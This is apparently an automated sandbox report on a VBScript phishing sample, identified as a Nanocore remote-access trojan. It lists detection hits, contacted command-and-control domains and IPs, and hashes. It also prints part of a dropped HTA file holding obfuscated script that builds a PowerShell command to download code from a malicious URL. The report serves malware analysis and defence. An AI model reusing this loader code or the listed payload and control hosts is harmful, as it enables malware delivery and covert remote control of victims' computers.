          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: powershell.exe, 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: aspnet_compiler.exe, 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: aspnet_compiler.exe, 0000000F.00000003.308324898.000000000609A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting221Registry Run Keys / Startup Folder1Process Injection211Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Registry Run Keys / Startup Folder1Scripting221Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol22Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection211/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553203 Sample: G2M18C6INV0ICERECEIPT.vbs Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 9 other signatures 2->42 7 wscript.exe 1 2->7         started        process3 signatures4 44 VBScript performs obfuscated calls to suspicious functions 7->44 46 Wscript starts Powershell (via cmd or directly) 7->46 10 powershell.exe 14 20 7->10         started        process5 dnsIp6 28 swmen.com 107.180.25.2, 49752, 49761, 80 AS-26496-GO-DADDY-COM-LLCUS United States 10->28 30 192.168.2.1 unknown unknown 10->30 26 C:\ProgramData\...\5197349279415287975939.HTA, HTML 10->26 dropped 48 Creates an undocumented autostart registry key 10->48 50 Writes to foreign memory regions 10->50 52 Injects a PE file into a foreign processes 10->52 15 aspnet_compiler.exe 9 10->15         started        20 conhost.exe 10->20         started        22 aspnet_compiler.exe 10->22         started        file7 signatures8 process9 dnsIp10 32 testalienscy9090.duckdns.org 185.140.53.10, 49764, 49765, 49766 DAVID_CRAIGGG Sweden 15->32 24 C:\Users\user\AppData\Roaming\...\run.dat, International 15->24 dropped 34 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->34 file11 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          G2M18C6INV0ICERECEIPT.vbs2%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          15.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          15.0.aspnet_compiler.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          15.0.aspnet_compiler.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          15.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          15.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://swmen.com/ben/PS1vedy.txt0%Avira URL Cloudsafe
          testalienscy9090.duckdns.org0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://crl.microsoft.co0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          http://swmen.com/ben/ServerATEVN.txt%27%3B%240%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://swmen.com0%Avira URL Cloudsafe
          http://swmen.com/ben/ServerATEVN.txt0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          testalienscy9090.duckdns.org
          185.140.53.10
          truetrue
            unknown
            swmen.com
            107.180.25.2
            truetrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://swmen.com/ben/PS1vedy.txtfalse
              • Avira URL Cloud: safe
              unknown
              testalienscy9090.duckdns.orgtrue
              • Avira URL Cloud: safe
              unknown
              http://swmen.com/ben/ServerATEVN.txtfalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpfalse
                  high
                  http://crl.microsoft.copowershell.exe, 00000001.00000003.275487622.000001C747BAD000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.314491027.000001C747BA2000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://go.micropowershell.exe, 00000001.00000003.274584028.000001C730E6A000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://swmen.com/ben/ServerATEVN.txt%27%3B%24powershell.exe, 00000001.00000003.274331638.000001C730C9D000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.303763663.000001C73063E000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.314395774.000001C747B00000.00000004.00020000.sdmp, powershell.exe, 00000001.00000003.274337560.000001C730CA2000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.274353820.000001C730CC7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.297834040.000001C72F76A000.00000004.00000001.sdmp, 5197349279415287975939.HTA.1.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://swmen.compowershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.296912388.000001C72F391000.00000004.00000001.sdmpfalse
                      high
                      HttP://swmen.com/ben/PS1vedy.txtPowerShell_transcript.210979.BVPagTEC.20220114133521.txt.1.drtrue
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          185.140.53.10
                          testalienscy9090.duckdns.orgSweden
                          209623DAVID_CRAIGGGtrue
                          107.180.25.2
                          swmen.comUnited States
                          26496AS-26496-GO-DADDY-COM-LLCUStrue

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:553203
                          Start date:14.01.2022
                          Start time:13:34:24
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 18s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:G2M18C6INV0ICERECEIPT.vbs
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:30
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.phis.troj.evad.winVBS@8/10@34/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .vbs
                          • Override analysis time to 240s for JS/VBS files not yet terminated
                          Warnings:
                          Show All
                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                          • TCP Packets have been reduced to 100
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          13:35:22API Interceptor46x Sleep call for process: powershell.exe modified
                          13:35:48API Interceptor1844x Sleep call for process: aspnet_compiler.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\5197349279415287975939\5197349279415287975939.HTA
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):3455
                          Entropy (8bit):4.5852092828887026
                          Encrypted:false
                          SSDEEP:96:Zadh1IAgdPeJdPxdP8dPudP/QdPfGj7dP2zRk/dPKQqdPgwj1P9SEnfcqjCUpYNZ:ZadheAgdPmdPxdP8dPudP/QdPfKdP2yx
                          MD5:0328D91C5D8F820EF69BDF98DD17310E
                          SHA1:23821BDB5C5C0500C557887E3083E26E4F4FBA7D
                          SHA-256:B51B5DE30F56E9FC09858C1F9A43F7B897286FF1582AE81F714A5D0D57552CA8
                          SHA-512:A63DC8E3460442C108B56A6E234A31286264536837DC7931EF5838BCA8E29365F4A5689B55E3B98276BC926325BEAE53093866D2B1B430F85E650AAE847D0725
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\ProgramData\5197349279415287975939\5197349279415287975939.HTA, Author: Joe Security
                          Reputation:low
                          Preview: <script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0AHB%20%3D%20replace%28%22pow%28-_-%29rsh%28-_-%29ll%20%22%2C%22%28-_-%29%22%2C%22e%22%29%0AHBB%20%3D%20%22%24@@@x%20%3D%20%27http://swmen.com/ben/ServerATEVN.txt%27%3B%24@@@%24%24%24%3D%28%27%7B2%7D%7B0%7D%7B1%7D%27%20-f%27---------l---------888---------Nguy%u1EC5n%20V%u0103n%20T%ED---------d---------%27Nguy%u1EC5n%20V%u0103n%20T%u1EE7nR777Nguy%u1EC5n%20V%u0103n%20T%E8olNguy%u1EC5n%20V%u0103n%20T%ED666777%28%27---------%27%2C%27%27%29%2C%27**********+++**********t**********r**********i**********n**********g**********%27Nguy%u1EC5n%20V%u0103n%20T%u1EE7nR777Nguy%u1EC5n%20V%u0103n%20T%E8olNguy%u1EC5n%20V%u0103n%20T%ED666777%28%27**********%27%2C%27%27%29%2C%27++++++++++D++++++++++888++++++++++w++++++++++n++++++++++%27Nguy%u1EC5n%20V%u0103n%20T%u1EE7nR777Nguy%u1EC5n%20V%u0103n%20T%E8olNguy%u1EC5n%20V%u0103n%20T%ED666777%28%27++++++++++%27%2C%27%27%29%29%3B%24@@@%24%24%
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11606
                          Entropy (8bit):4.883977562702998
                          Encrypted:false
                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1192
                          Entropy (8bit):5.325275554903011
                          Encrypted:false
                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                          MD5:05CF074042A017A42C1877FC5DB819AB
                          SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                          SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                          SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                          Malicious:false
                          Reputation:moderate, very likely benign file
